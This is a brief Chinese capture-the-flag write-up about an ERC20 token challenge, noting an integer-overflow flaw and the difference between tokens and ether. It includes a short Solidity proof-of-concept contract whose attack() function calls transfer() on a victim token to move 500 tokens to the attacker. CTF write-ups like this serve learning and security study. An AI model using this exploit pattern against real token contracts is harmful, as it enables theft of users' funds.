题意理解:一开始觉得题目考察的是整型溢出漏洞(虽然该漏洞在该合约中确实存在),但后来发现并非如此,个人觉得本题更倾向于考察对ERC20代币和以太坊主币的区分
以下是本题的POC合约:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface Token {
function transfer(address _to, uint _value) external returns (bool);
function balanceOf(address _owner) external view returns (uint balance);
}
contract POC {
address public owner;
address public victim;
constructor(){
owner = msg.sender;
}
function setVictim(address victim_) public {
victim =victim_;
}
function attack () public {
Token token = Token(victim);
token.transfer(owner , 500);
}
}